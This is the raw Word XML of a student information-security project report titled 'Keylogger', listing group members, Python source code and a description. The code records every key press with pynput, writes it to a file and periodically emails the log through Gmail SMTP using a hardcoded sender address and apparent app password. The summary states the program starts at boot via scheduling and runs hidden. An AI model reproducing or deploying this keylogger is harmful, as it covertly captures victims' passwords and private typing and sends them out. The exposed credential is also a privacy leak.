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1E1C" w14:textId="77777777" w:rsidR="00F87096" w:rsidRDefault="008801F0" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">                                                </w:t>
      </w:r>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AE47A67" wp14:editId="7A38871A">
            <wp:extent cx="2952750" cy="2638425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5943" name="Picture 342095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67" cy="26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D995" w14:textId="77777777" w:rsidR="00F87096" w:rsidRDefault="008801F0" w:rsidP="00F87096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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327418EC" w14:textId="77777777" w:rsidR="008801F0" w:rsidRPr="008801F0" w:rsidRDefault="008801F0" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> IS Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AECEFE0" w14:textId="77777777" w:rsidR="008801F0" w:rsidRDefault="008801F0" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Project :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB2B8E" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="008801F0" w:rsidRDefault="008801F0" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Members </w:t>
      </w:r>
      <w:r w:rsidR="00F87096" w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82D5DB" w14:textId="77777777" w:rsidR="002735A8" w:rsidRPr="002735A8" w:rsidRDefault="008801F0" w:rsidP="00F87096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 xml:space="preserve">                             </w:t>
      </w:r>
      <w:r w:rsidR="00F87096" w:rsidRPr="002735A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>BASIT (21SW005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F530249" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="002735A8" w:rsidRDefault="00F87096" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002735A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                             WASIM AKRAM (21SW025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8B6830" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="002735A8" w:rsidRDefault="00F87096" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002735A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                             WASATULLAH JAMALI (21SW028)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528BFB8" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="002735A8" w:rsidRDefault="00F87096" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002735A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                             DANISH (21SW136)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FDE37" w14:textId="77777777" w:rsidR="00F87096" w:rsidRDefault="00F87096" w:rsidP="00F87096"/>
    <w:p w14:paraId="7E0CE527" w14:textId="77777777" w:rsidR="00F87096" w:rsidRDefault="00F87096" w:rsidP="00F87096"/>
    <w:p w14:paraId="4FC00F10" w14:textId="77777777" w:rsidR="00F87096" w:rsidRDefault="00F87096" w:rsidP="00F87096"/>
    <w:p w14:paraId="160EC96F" w14:textId="77777777" w:rsidR="008801F0" w:rsidRDefault="008801F0" w:rsidP="00F87096"/>
    <w:p w14:paraId="50525B06" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="008801F0" w:rsidRDefault="00F87096" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Keylogger Code</w:t>
      </w:r>
      <w:r w:rsidR="008801F0" w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027ADBC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from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pynput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import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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B882B" w14:textId="36C7BBF8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import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smtplib</w:t>
      </w:r>
      <w:r w:rsidR="005C72B5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,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ssl </w:t>
      </w:r>
      <w:r w:rsidR="005C72B5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,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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5543D1CE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25D4B32A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sender_mail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"waseemjanyaro@gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA183D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receiver_mail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"wasayojanyaro@gmail.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB0CF07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password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"kuht acaw yydy jkul"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3003048E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port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B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>587</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED27A39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message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 xml:space="preserve">"The keys will be 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</w:p>
    <w:p w14:paraId="6BA7D736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20F83239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'The program will start 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6CAB7511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08B70E81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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def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write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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>value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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4321E" w14:textId="70E7BA5B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with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open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="006A2E9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audit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.txt"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,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'a'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)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as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file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28F39F2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file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.write(value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252CCD78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42D3409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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>def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key_press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9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>key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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6101EC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try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4D938F41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if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keyboard.Key.enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB864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568A5D0E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else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1520BC14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(key.char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC048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write(key.char)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA5E6BD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</w:p>
    <w:p w14:paraId="5991AFA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except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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AttributeError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450BC4ED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if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keyboard.Key.backspace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E813A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'BACKSPACE PRESS'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490072B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Press Backspace  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313D14C5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elif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keyboard.Key.tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5297F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'TAB PRESS'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6E9BD23D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 xml:space="preserve">Press Tab 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6ADD584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elif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keyboard.Key.space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488FBD9C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'SPACE'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4D69D739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 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70727F78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else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73910FA8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temp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repr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(key)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+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 Pressed.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</w:p>
    <w:p w14:paraId="1F12A3FB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    write(temp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2929A914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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{}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 xml:space="preserve"> Pressed.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.format(key))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA84565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387AF87A" w14:textId="566B59A6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listener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keyboard.Listener(</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on_press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key_press)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B306B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listener.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D5961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2DAFAC0B" w14:textId="6F359CC8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while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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>True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4767EB5A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lastRenderedPageBreak/>
        <w:t>    time.sleep(</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>60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798D45F3" w14:textId="6A10DC9C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</w:p>
    <w:p w14:paraId="3BC16A3F" w14:textId="3A2BEB89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with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open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  <w:r w:rsidR="006A2E9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audit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.txt"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,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'r'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)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as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file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0615CD2E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temp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file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.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6D0C78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message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+=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temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B841842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</w:p>
    <w:p w14:paraId="05A36C74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context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ssl.create_default_context()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698454C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</w:p>
    <w:p w14:paraId="14B4A6A4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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4797F7" w14:textId="77777777" w:rsidR="005C72B5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</w:p>
    <w:p w14:paraId="7D456C33" w14:textId="4092DD7B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server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smtplib.SMTP(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"smtp.gmail.com"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, port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B54D856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server.starttls(</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>context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context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC462B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server.login(sender_mail, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591C9AE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</w:p>
    <w:p w14:paraId="396EEA4E" w14:textId="3D9190FF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1F8521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server.sendmail(sender_mail, receiver_mail, message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743382E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"Email sent to"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, receiver_mail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEF37B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</w:p>
    <w:p w14:paraId="6F8CC5BF" w14:textId="7C6E2930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message </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=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 xml:space="preserve">"The keys will be </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\n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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B3577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</w:p>
    <w:p w14:paraId="258EBA20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        server.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F871153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except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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exception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</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as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 e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB083BB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"Error:"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, e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA6A09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</w:rPr>
      </w:pP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 xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print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(</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"Failed to send email."</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382B196" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7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27E3AAEC" w14:textId="77777777" w:rsidR="008801F0" w:rsidRDefault="008801F0" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6420FAFF" w14:textId="77777777" w:rsidR="00F87096" w:rsidRPr="008801F0" w:rsidRDefault="00F87096" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:r w:rsidR="008801F0" w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008801F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049EB9E" w14:textId="77777777" w:rsidR="008801F0" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Our project is a keylogger. We have used scheduling to start the keylogger’s exe file as the computer starts. The keylogger is running in the background in hidden form ( It is not visible directly on the interface ). The keylogger stores the keys pressed and sends email time to time on the email address given by us.  </w:t>
      </w:r>
      <w:r w:rsidR="008801F0" w:rsidRPr="009D7F77">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0E438" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Project Components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649FE752" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657A30B8" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Keylogger Functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABED52" w14:textId="292F02B6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lastRenderedPageBreak/>
        <w:t>The keylogger captures keyboard events such as key presses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC1A8A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It distinguishes between regular characters, special keys (like Enter, Backspace, Tab, and Space), and other keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452D901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Logged keystrokes are stored in a local text file named "KeyLoggerFile.txt".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195BD009" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Email Reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248A67C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Periodically, the keylogger reads the logged keystrokes from the file and prepares an email message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827CC3E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It establishes a secure connection to the email server using TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D367A0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Authentication is performed using sender email credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B3DB1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The email message is sent to the specified recipient email address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA7D99" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D7F77">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After sending the email, the content of the log file is cleared for the next iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A714FAA" w14:textId="77777777" w:rsidR="0037563A" w:rsidRDefault="0037563A" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780A1AF9" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Implementation Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B9CA14" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Library Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A326B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The project utilizes the pynput library to capture keyboard events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BCDB7C" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="009D7F77" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The smtplib library is used for sending emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083CE8C3" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Event Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BA239C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Keyboard events are handled using the Listener class provided by the pynput library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4D5F0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Key press events are processed to log the corresponding keystrokes in the text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C02FDA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Special keys are appropriately identified and logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8ABF8" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Email Sending:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA008B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Emails are sent using the SMTP protocol with TLS encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2397DB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t>Gmail's SMTP server (smtp.gmail.com) is used for sending emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768591B5" w14:textId="77777777" w:rsidR="009D7F77" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sender email credentials are required for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D33D532" w14:textId="77777777" w:rsidR="002735A8" w:rsidRPr="0037563A" w:rsidRDefault="009D7F77" w:rsidP="009D7F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The logged keystrokes are included in the email message body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886D686" w14:textId="77777777" w:rsidR="00812700" w:rsidRDefault="00812700" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
